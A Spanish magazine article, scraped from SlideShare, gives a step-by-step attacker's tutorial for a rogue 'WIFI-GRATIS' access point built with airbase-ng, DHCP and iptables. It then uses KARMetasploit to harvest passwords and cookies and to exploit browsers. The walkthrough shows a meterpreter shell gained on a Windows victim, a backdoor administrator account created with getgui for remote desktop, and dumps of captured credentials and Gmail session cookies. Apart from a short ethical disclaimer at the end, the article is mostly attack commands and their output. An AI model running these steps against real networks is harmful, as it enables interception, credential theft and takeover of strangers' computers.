SlideShare una empresa de Scribd logo
1 de 5
Descargar para leer sin conexión
seguridad
     Airbase y KARMetasploit




       Airbase
       y KARMetasploit:
       Despliegue de puntos de acceso
       ilícitos (Rogue AP)
       Daniel García Gutierrez
       Cuando nos conectamos a redes Wi-Fi libres desconocidas no sabemos a qué riesgos
       podemos estar sometidos. En este artículo nos pondremos en el lado del atacante y veremos
       cómo lanzar un punto de acceso con nuestro adaptador inalámbrico y las herramientas
       airbase-ng (suite aircrack-ng) y el modulo Karma de Metasploit Framework para la realización
       de ataques contra los navegadores de los clientes.




                                         U
                                                         n Rogue AP es un punto de acceso inalám-     airbase-ng nos permitirá capturar todo tipo de datos de
                     es@lpmagazine.org




                                                         brico normalmente creado para llevar a ca-   los clientes conectados, recopilar información, hacer
                                                         bo un ataque Man in the Middle (Hombre       redirecciones malintencionadas a sitios web para ob-
                                                         en medio), pudiendo así capturar todo el     tener cookies, y realizar todo tipo de ataques contra
                                         tráfico que las víctimas envíen (passwords, cookies...).     los navegadores de los clientes. Entre otras cosas lo
                                                                                                      podremos utilizar para:
                                         Airbase-ng y KARMetasploit
                                         Airbase-ng es una herramienta multi-propósito de la Suite    •   Capturar passwords de POP3 e IMAP 4 (plano y SSL),
                                         Aircrack-ng (http://www.aircrack-ng.org) que nos permite     •   Capturar correo enviado vía SMTP,
                                         levantar un punto de acceso “falso” con nuestro adaptador    •   Capturar usuarios / passwords de FTP y HTTP,
                                         inalámbrico. También es utilizada para atacar a clientes     •   Obtener cookies de sitios populares (gmail, yahoo,
                                         conectados a un punto de acceso con el fin de generar trá-       facebook, myspace...),
                                         fico y nuevos IVs (Vectores de inicialización), esenciales   •   Obtener campos de formulario enviados vía HTTP,
                                         para romper una clave WEP.                                   •   Ataques SMB Relay,
                                              En este caso la utilizaremos para simular un punto de   •   Explotar vulnerabilidades de los navegadores.
                                         acceso abierto con servicio DHCP, en el que los clientes
                                         que se conecten, se les asignará una IP/DNS/Gateway          KARMetasploit guarda todo lo capturado en una base
                                         y saldrán a internet normalmente haciendo DNAT con           de datos SQLite y si consigue explotar una vulne-
                                         iptables en el equipo atacante.                              rabilidad en el navegador, nos abrirá una sesión de
                                              KARMetasploit es un módulo de Metasploit Frame-         meterpreter con la que podremos interacturar con el
                                         work (http://www.metasploit.com) que utilizándolo con        equipo víctima.




34                                                                           LiNUX+ 3/2010
seguridad
                                                                                                                             Airbase y KARMetasploit




Figura 1. Ejecución airbase-ng

Material necesario
Para realizar todo este proceso necesitaremos un adaptador ina-
                                                                              Figura 2. Configuración de red y arranque del DHCP
lámbrico con un chipset que soporte modo monitor y una conexión
a internet para que los clientes que se conecten al Falso AP, salgan al ex-        Este fichero lo podemos guardar donde queramos, yo lo dejaré en
terior y puedan navegar correctamente. Necesitaremos tener instalado          la carpeta de metasploit.
en nuestra máquina Metasploit Framework y la suite Aircrack-ng. En
este artículo utilizaremos BackTrack 4 Final (distribución GNU/Linux          Arrancando punto de acceso falso
orientada para la auditoría de seguridad) ya que tendremos instaladas         Para desplegar el punto de acceso falso con airbase-ng, utilizaremos
esas y otras herramientas interesantes. Descarga de BackTrack 4 Final         el siguiente comando:
(PwnSauce): http://www.backtrack-linux.org/downloads/.
                                                                              # airbase-ng -v       -P   -C <SEGUNDOS>        -e <ESSID>
Configuración del punto de acceso falso                                        <interface>
Antes que nada, iremos a la carpeta de metasploit y lo actualizaremos
a la versión actual:                                                  En mi caso crearé un falso AP llamado “WIFI-GRATIS” y utilizare la
                                                                      interfaz wlan1 para ello.
# cd /pentest/exploits/framework3/                                         Antes de nada, pondré la interfaz en modo monitor (lista de chip-
# svn update                                                          sets compatibles en modo monitor: http://aircrack-ng.org/doku.php?
                                                                      id=compatibility_drivers): # iwconfig wlan1 mode monitor
Nos descargamos el módulo karma en la carpeta /pentest/exploits/           Si tenemos problemas, podemos utilizar el script airmon-ng de la
framework3:                                                           suite aircrack-ng:# airmon-ng start <interface> [canal]
                                                                           Luego, lanzamos el falso AP:# airbase-ng -v -P -C 30 -e
# wget http://metasploit.com/users/hdm/tools/karma.rc                         WIFI-GRATIS wlan1.
-o /pentest/exploits/framework3/karma.rc                                           Airbase nos informa que se ha creado una nueva interfaz virtual
                                                                              tap llamada at0 (Figura 1). Para poder utilizarla, levantaremos la in-
Instalamos algunos requerimientos: # gem install activerecord                 terfaz con la dirección IP 10.0.0.1/24 y pondremos nuestro servidor
sqlite3-ruby.                                                                 DHCP a la escucha en ella:

Configuración servicio DHCP                                                    # ifconfig at0 10.0.0.1 netmask 255.255.255.0 up
El cliente cuando se conecte al AP esperará a que se le asigne una di-
rección IP por DHCP, entonces tendremos que configurar dhcpd3 pa-              Listado 1. Fichero configuración dhcpd.conf
ra que asigne la configuración de red a todos los clientes que se aso-
cien (Listado 1). Como podemos observar usaremos la red 10.0.0.0/              asoption domain-name-servers
24 y el servidor DHCP asignará IPs desde el rango 10.0.0.100 hasta                  208.67.222.222, 208.67.220.220;
10.0.0.254, siendo el router la dirección 10.0.0.1.
    Los servidores DNS que serán asignados a los clientes, son los             default-lease-time 60;
de OpenDNS.                                                                    max-lease-time 72;

Tabla 1. Parámetros airbase-ng                                                 ddns-update-style none;
 Parámetro             Descripción                                             authoritative;
 -v                    Nos va mostrando todo lo que va haciendo.               log-facility local7;
 -P                    Responder a todas las Pruebas de Sondeo
                       enviadas por los clientes.                              subnet 10.0.0.0 netmask 255.255.255.0 {

 -C <segundos>                                                                     range 10.0.0.100 10.0.0.254;
                       Número de segundos para que los clientes
                                                                                   option routers 10.0.0.1;
                       puedan volver a transmitir Solicitudes de Sondeo
                                                                                   option domain-name-servers
                       (Probe request) al AP.
                                                                                   208.67.222.222, 208.67.220.220;
 -e <ESSID>            Nombre identificador de la red inalámbrica.
                                                                               }
 <interface>           Nombre interfaz inalámbrica en modo monitor
                       que utilizaremos para simular el falso AP.




                                                                     www.lpmagazine.org                                                                35
seguridad
     Airbase y KARMetasploit



        Arrancamos el DHCP con el fichero de configuración puesto ante-            Comprobando conectividad en el equipo víctima
        riormente: # dhcpd3 -cf dhcpd.conf at0.                                    Nos conectamos al punto de acceso falso con ESSID WIFI-GRATIS
            Si todo va correctamente, aparecerá lo siguiente (ver Figura 2).       desde el equipo víctima y comprobaremos que sale a internet.
        Si no os arranca el dhcpd3, puede ser que exista otro proceso activo.
        Para matarlos utilizaremos: # killall dhcpd3.                              Atacando clientes con KARMetasploit
            Cuando un cliente se conecte a nuestro falso AP, se le asignará        Una vez configurado el punto de acceso falso, lanzaremos el módulo
        una IP, pero...¿Cómo hacemos para que salga a internet?                    karma para que empiece a capturar información y atacar a los clientes
            Lo que tendremos que hacer, es decir a nuestra máquina que per-        conectados.
        mita la redirección de tráfico ipv4, para ello ejecutaremos el siguiente       Tendremos que ir a la carpeta de metasploit, que es donde descar-
        comando: # echo 1 >/proc/sys/net/ipv4/ip_forward.                          gamos el módulo karma: # cd /pentest/exploits/framework3/.
            Si queremos hacer que este cambio sea permanente, tendremos                Lanzamos metasploit cargando el módulo karma: # msfconsole
        que modificar el fichero /etc/sysctl.conf descomentando la varia-          -r karma.rc.
        ble net.ipv4.ip_forward y poniéndola de valor 1, quedando: net.              Como podemos ver, crea una base de datos en /root/karma.db
        ipv4.ip_forward=1.                                                      y se pone a cargar módulos como browser_autopwn (redireccio-
            Para que puedan salir todos los clientes conectados por la misma nes malintencionadas), servidores para capturar logins POP3,
        dirección IP pública, haremos DNAT (Traducción dinámica de direc- SMTP, IMAP, FTP, HTTP. También carga diversos exploits contra
        ciones de red) con iptables: # iptables -t nat -A PREROUTING vulnerabilidades de los navegadores, permitiéndonos hasta obte-
        -i at0 -j REDIRECT.                                                     ner una shell en el equipo víctima. Toda la información que vaya
            Así quedará todo bien configurado para que los clientes que se capturando lo irá metiendo en la base de datos que creó al prin-
        asocien al punto de acceso falso puedan salir a internet correctamente. cipio, esto nos permitirá ver los datos capturados detenidamente
        Como el tráfico siempre pasará por la interfaz at0, podemos arrancar cuando queramos.
        un sniffer como wireshark y analizar todos los paquetes que salen al         Utilizaré de víctima un “Windows XP Profesional SP1” para ver
        exterior.                                                               como KARMetasploit aprovecha las vulnerabilidades del Internet Ex-
                                                                                plorer obteniendo una shell del equipo víctima. Desde el equipo víctima
                                                                                conectado al punto de acceso falso, abrimos un sitio web con Internet
                                                                                Explorer y vemos que nos aparece una página con fondo negro que po-
                                                                                ne “Loading...”. Esto lo que hace es redirigir al equipo víctima a sitios
                                                                                webs populares como gmail, facebook, twitter haciéndolo de forma
                                                                                “medio-transparente” para capturar las cookies. También ejecuta en el
                                                                                navegador de la víctima los exploits contra los fallos de los navegado-
                                                                                res. En la ventana del atacante irá mostrando todo lo que va capturando
                                                                                y haciendo en todo momento.
                                                                                     Como podemos observar en la siguiente imagen (Figura 6),
                                                                                KARMetasploit se aprovechó de una vulnerabilidad del navegador
        Figura 3. Comprobación de conectividad




                                                                                   Figura 5. Ejecución del navegador en el equipo victima




        Figura 4. Arranque KARMetasploit                                           Figura 6. Sesión de meterpreter creada




36                                                                   LiNUX+ 3/2010
seguridad
                                                                                                                         Airbase y KARMetasploit



Internet Explorer y nos avisa de que se ha creado una sesión de me-          Para volver al Meterpreter, ejecutaremos exit. Si queremos
terpreter en el equipo 10.0.0.106.                                       obtener la lista de funciones que podemos utilizar, ejecutamos el
                                                                         comando help.
¿Qué es meterpreter?
Meterpreter o meta-intérprete son unos plugins avanzados de Me-          Activando escritorio remoto
tasploit framework para utilizar bajo sistemas Windows comprome-         Desde meterpreter podremos cargar otros scripts bastante intere-
tidos, permitiéndonos realizar diversas funciones sin crear procesos     santes como getgui, que nos permite activar el escritorio remoto de
adicionales en la máquina víctima, entre ellas:                          Windows (RDP) y a la vez crearnos un usuario administrador. Para
                                                                         lanzar el script, ejecutaremos la orden:
•   Leer, descargar, subir, editar y borrar ficheros,
•   Mostrar directorio de trabajo,                                       meterpreter> run getgui.
•   Crear directorios,
•   Ejecutar comandos del sistema,                                       Si lo ejecutamos sin parámetros nos mostrará la ayuda (Tabla 2).
•   Ver y modificar configuración de red,
•   Editar registro,                                                     Tabla 2. Parámetros getgui
•   Añadir usuarios, grupos,                                              Parámetro          Descripción
•   Arrancar escritorio remoto,                                           -e                 Habilita únicamente RDP en la máquina víctima.
•   Arrancar un sniffer, keylogger...,
                                                                          -u <usuario>       Nombre para el usuario a crear. También habilita RDP.
•   Dumpear la SAM.
                                                                          -p <clave>         Password para el usuario.

Como vimos en la imagen anterior (ver Figura 6), se pudo explotar la
vulnerabilidad del Internet Explorer y se abrió una sesión de Meter-      Listado 2. Registros tabla hosts
preter en segundo plano. Si se conectaran más clientes al punto de ac-
ceso falso con vulnerabilidades en los navegadores, se irán abriendo      sqlite> select * from hosts;
más sesiones de meterpreter ya que es el payload utilizado en todos       1|2010-01-20 20:37:14|10.0.0.119
los exploits que se ejecutan.                                                  |||||unknown||Windows|XP|SP2|es|x86|1
                                                                          2|2010-01-20 23:35:42|10.0.0.106
Abriendo sesion meterpreter                                                    |||||unknown||Windows|XP|undefined|es-ES|x86|1
Una vez las víctimas hayan picado en el anzuelo, podremos pulsar          3|2010-01-20 20:45:43|10.0.0.121
CTRL+C para poder ejecutar comandos en Metasploit. Utilizaremos                |||||unknown|||||||1
el comando sessions para interactuar con las sesiones creadas por         4|2010-01-20 21:28:58|10.0.0.104
meterpreter.                                                                   |||||unknown|||||||1
    Ver listado de sesiones creadas: # sessions -l.                       5|2010-01-20 21:58:19|10.0.0.123
    Vemos que tenemos shell meterpreter en el equipo 10.0.0.106.               |||||unknown||Windows|XP|undefined|es|x86|1
con Identificador: 1 (Figura 7).
    Para utilizar una sesión, tendremos que ejecutar: # sessions -i
<ID_Sesion>.
    En nuestro caso: # sessions -i 1.                                     Listado 3. Notas del equipo con host_id = 2
    Esto nos abrirá la sesión 1 de meterpreter que fue creada en el
equipo víctima.                                                           sqlite> select * from notes where host_id=2;
    Si queremos interactuar directamente con la consola de Windows        802|2010-01-21 00:00:15|auth.ftp|---
en vez de con meterpreter, ejecutaremos el comando 'shell'. Aquí po-      :targ_host: XXX.XXX.XXX.XX
dremos ejecutar los comandos que nos vengan al antojo.                    :pass: toor
                                                                          :targ_port: "21"
                                                                          :user: root
                                                                          |1||2
                                                                          .........
                                                                          711|2010-01-20 23:35:41|http_
                                                                          cookies|gmail.google.com PREF=ID=
                                                                          05aa4f5170ecdf51:U=bdc3782d1406e6d3:TM=
                                                                          1263927119:LM=1263927412:S=
                                                                          Yr0MOnA4A42OohNL; NID=31=
                                                                          CrFGymeOCASXIr9cS_gKDdB7Swrn
                                                                          KEw60BP369Nhg8jMaH69Nsrqr5k_
                                                                          YcM6nGOiRbpBZuKPWPEyNIDovMCF0
                                                                          g8tmV1UZBrIr8WZcdCT0j-bzUpQQWuub4nQW0d4qWr6|1||2


Figura 7. Lista de sessiones meterpreter




                                                               www.lpmagazine.org                                                                    37
seguridad
     Airbase y KARMetasploit



        Crearemos un usuario llamado “owner” con password “12345”:
        meterpreter> run getgui -u owner -p 12345.
           Ahora nos podremos conectar al equipo víctima por escritorio re-
        moto y con privilegios de administrador: # rdesktop 10.0.0.106.

        Accediendo a la información registrada por
        KARMetasploit
        Otra forma de ver los datos que hemos capturado de los clientes, es
        conectarnos a la base de datos sqlite3 que nos crea el módulo karma
        en /root/karma.db. Para conectarnos a la base de datos ejecutaremos
        el comando:

        # sqlite3 /root/karma.db

                                                                                 Figura 10. Conexión escritorio remoto con el equipo victima
        Esto nos devolverá una consola de sqlite3. Si queremos observar las
        estructuras de las tablas creadas, ejecutamos:

        sqlite> .schema


        En la tabla “hosts” podemos encontrar las máquinas detectadas por
        karma (Listado 2).
            En la tabla “notes” encontraremos cookies y passwords captura-
        dos de los clientes. Si queremos ver las notas capturadas de la máqui-
        na 10.0.0.106, que es el host_id 2, podemos ejecutar la consulta:

        select * from notes where host_id=2 ;


            También tenemos la opción de inspeccionar la base de datos de
        una forma más cómoda con una GUI de sqlite3 llamada “sqlitebrow-
                                                                          Figura 11. Registros tabla hosts
        ser”. Para instalarla en Debian o derivados:
                                                                          Abrir base de datos con sqlitebrowser:
        # apt-get install sqlitebrowser
                                                                                 # sqlitebrowser /root/karma.db


                                                                                 Conclusión
                                                                                 Como podemos ver, estas herramientas nos dan bastante juego y pue-
                                                                                 den llegar a ser bastante peligrosas en manos de una persona con
                                                                                 malas intenciones.
                                                                                     Éticamente podemos utilizar todo esto para el estudio de redes
                                                                                 Wi-Fi (802.11), comprobar la seguridad de nuestros equipos, con-
                                                                                 cienciarnos de utilizar protocolos seguros y por supuesto conocer
                                                                                 a qué tipo de ataques podemos ser sometidos si nos conectamos a un
                                                                                 punto de acceso desconocido o suplantado.


        Figura 8. Consola Windows desde meterpreter
                                                                                  Sobre el autor
                                                                                  Daniel García Gutierrez (danigargu@gmail.com) es un gran afi-
                                                                                  cionado a la programación y la seguridad informática. Viviendo
                                                                                  actualmente en la provincia de Burgos, dedica la mayor parte
                                                                                  de su tiempo libre a la investigación de la seguridad informática,
                                                                                  en concreto, seguridad web, contando en esto con más de 4
                                                                                  años de experiencia.
                                                                                     Actualmente se encuentra programando en el lenguaje
                                                                                  PERL un analizador de código para la detección de vulnerabi-
                                                                                  lidades en scripts PHP, pudiéndonos ayudar esto a comprobar
                                                                                  si nuestros códigos son posiblemente vulnerables a diferentes
        Figura 9. Habilitando escritorio remoto                                   tipos de ataques conocidos en la actualidad.




38                                                                 LiNUX+ 3/2010

Más contenido relacionado

La actualidad más candente

Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]RootedCON
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]RootedCON
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Servidor Web Apache, PHP, MySQL.
Servidor Web Apache, PHP, MySQL.Servidor Web Apache, PHP, MySQL.
Servidor Web Apache, PHP, MySQL.Ángel Acaymo M. G.
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
 
Comparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseComparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseIrontec
 
Seguridad en Apache
Seguridad en ApacheSeguridad en Apache
Seguridad en Apachemagnobalt
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Router os basicsv0 3espanol-mikrotik
Router os basicsv0 3espanol-mikrotikRouter os basicsv0 3espanol-mikrotik
Router os basicsv0 3espanol-mikrotikJulians Crystal
 
Mikrotik RouterOs basics v0.3 español
Mikrotik RouterOs basics v0.3 españolMikrotik RouterOs basics v0.3 español
Mikrotik RouterOs basics v0.3 españolRod Hinojosa
 
Evitar Ataque a MikroTik Webproxy y DNS cache
Evitar Ataque a MikroTik Webproxy y DNS cacheEvitar Ataque a MikroTik Webproxy y DNS cache
Evitar Ataque a MikroTik Webproxy y DNS cachegarsoftsolutions
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesJavier H
 
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...Universidad Nacional Autonoma de Mexico
 

La actualidad más candente (18)

Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
 
Seguridad en i pv6 (2)
Seguridad en  i pv6 (2)Seguridad en  i pv6 (2)
Seguridad en i pv6 (2)
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Servidor Web Apache, PHP, MySQL.
Servidor Web Apache, PHP, MySQL.Servidor Web Apache, PHP, MySQL.
Servidor Web Apache, PHP, MySQL.
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Comparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseComparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSense
 
Seguridad en Apache
Seguridad en ApacheSeguridad en Apache
Seguridad en Apache
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Router os basicsv0 3espanol-mikrotik
Router os basicsv0 3espanol-mikrotikRouter os basicsv0 3espanol-mikrotik
Router os basicsv0 3espanol-mikrotik
 
Tema servlets
Tema servletsTema servlets
Tema servlets
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8
 
Mikrotik RouterOs basics v0.3 español
Mikrotik RouterOs basics v0.3 españolMikrotik RouterOs basics v0.3 español
Mikrotik RouterOs basics v0.3 español
 
Evitar Ataque a MikroTik Webproxy y DNS cache
Evitar Ataque a MikroTik Webproxy y DNS cacheEvitar Ataque a MikroTik Webproxy y DNS cache
Evitar Ataque a MikroTik Webproxy y DNS cache
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devices
 
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...
Cómo configurar una red wi fi segura y protegerla ante posibles ataques de re...
 

Destacado

Problematica taller sesión ii
Problematica taller sesión iiProblematica taller sesión ii
Problematica taller sesión iiUniversidad Libre
 
Dutch manuel de identidad
Dutch manuel de identidadDutch manuel de identidad
Dutch manuel de identidadroxanneh
 
200701260805380.charla c lectura
200701260805380.charla c lectura200701260805380.charla c lectura
200701260805380.charla c lecturamarcostobares
 
Tratamiento de la información y competencia digital
Tratamiento de la información y competencia digitalTratamiento de la información y competencia digital
Tratamiento de la información y competencia digitalelblogdemarcelo
 
Notas de clases modelo arch para accion de ecopetrol[1][1]
Notas de clases modelo arch para accion de ecopetrol[1][1]Notas de clases modelo arch para accion de ecopetrol[1][1]
Notas de clases modelo arch para accion de ecopetrol[1][1]ucmc
 
Introducción pai unit 2 1º
Introducción pai unit 2 1ºIntroducción pai unit 2 1º
Introducción pai unit 2 1ºaimorales
 
Situación socioeducativa de niñas, niños y adolescentes de comunidades toba
Situación socioeducativa  de niñas, niños y adolescentes  de comunidades tobaSituación socioeducativa  de niñas, niños y adolescentes  de comunidades toba
Situación socioeducativa de niñas, niños y adolescentes de comunidades tobamaugenocioni
 
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida Blanca
 

Destacado (20)

Resumen
ResumenResumen
Resumen
 
Es cuanto! abril_mayo
Es cuanto! abril_mayoEs cuanto! abril_mayo
Es cuanto! abril_mayo
 
Motivación
 Motivación  Motivación
Motivación
 
Problematica taller sesión ii
Problematica taller sesión iiProblematica taller sesión ii
Problematica taller sesión ii
 
Dutch manuel de identidad
Dutch manuel de identidadDutch manuel de identidad
Dutch manuel de identidad
 
200701260805380.charla c lectura
200701260805380.charla c lectura200701260805380.charla c lectura
200701260805380.charla c lectura
 
Aprendizaje basado en problemas
Aprendizaje basado en problemasAprendizaje basado en problemas
Aprendizaje basado en problemas
 
Proceso 1980
Proceso 1980Proceso 1980
Proceso 1980
 
Pedag social
Pedag socialPedag social
Pedag social
 
Tratamiento de la información y competencia digital
Tratamiento de la información y competencia digitalTratamiento de la información y competencia digital
Tratamiento de la información y competencia digital
 
Notas de clases modelo arch para accion de ecopetrol[1][1]
Notas de clases modelo arch para accion de ecopetrol[1][1]Notas de clases modelo arch para accion de ecopetrol[1][1]
Notas de clases modelo arch para accion de ecopetrol[1][1]
 
Introducción pai unit 2 1º
Introducción pai unit 2 1ºIntroducción pai unit 2 1º
Introducción pai unit 2 1º
 
Evaluación
EvaluaciónEvaluación
Evaluación
 
Situación socioeducativa de niñas, niños y adolescentes de comunidades toba
Situación socioeducativa  de niñas, niños y adolescentes  de comunidades tobaSituación socioeducativa  de niñas, niños y adolescentes  de comunidades toba
Situación socioeducativa de niñas, niños y adolescentes de comunidades toba
 
Cientifica 4 5 2007
Cientifica 4 5 2007Cientifica 4 5 2007
Cientifica 4 5 2007
 
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida
C:\Documents And Settings\Blanca\My Documents\My Documents\Celebra La Vida
 
Manual del operador
Manual del operadorManual del operador
Manual del operador
 
Sistemas
SistemasSistemas
Sistemas
 
Terremotos
TerremotosTerremotos
Terremotos
 
Guia1 (1)
Guia1 (1)Guia1 (1)
Guia1 (1)
 

Similar a Airbase y KARMetasploit

Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Carlos Alderete
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentestingakencito
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxWaldir Nuñez Francia
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6davister
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))begolnx
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad WirelessJaime Restrepo
 
Proyecto 6 Acceso a redes
Proyecto 6 Acceso a redesProyecto 6 Acceso a redes
Proyecto 6 Acceso a redesjavipiris
 
Scapy. Generación y manipulación básica de paquetes de red
Scapy. Generación y manipulación básica de paquetes de redScapy. Generación y manipulación básica de paquetes de red
Scapy. Generación y manipulación básica de paquetes de redDavid Cristóbal
 
Redes del computador unidad 3
Redes del computador unidad 3Redes del computador unidad 3
Redes del computador unidad 3AngelSoto104
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 

Similar a Airbase y KARMetasploit (20)

Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Present3
Present3Present3
Present3
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode Solución
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad Wireless
 
Proyecto 6 Acceso a redes
Proyecto 6 Acceso a redesProyecto 6 Acceso a redes
Proyecto 6 Acceso a redes
 
Proyecto 6 prueba
Proyecto 6 pruebaProyecto 6 prueba
Proyecto 6 prueba
 
Scapy. Generación y manipulación básica de paquetes de red
Scapy. Generación y manipulación básica de paquetes de redScapy. Generación y manipulación básica de paquetes de red
Scapy. Generación y manipulación básica de paquetes de red
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Redes del computador unidad 3
Redes del computador unidad 3Redes del computador unidad 3
Redes del computador unidad 3
 
Seguridad de las redes
Seguridad de las redesSeguridad de las redes
Seguridad de las redes
 
Crack Distribuido Atabuido
Crack Distribuido AtabuidoCrack Distribuido Atabuido
Crack Distribuido Atabuido
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Pix (1)
Pix (1)Pix (1)
Pix (1)
 

Último

guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
Presentación guía sencilla en Microsoft Excel.pptx
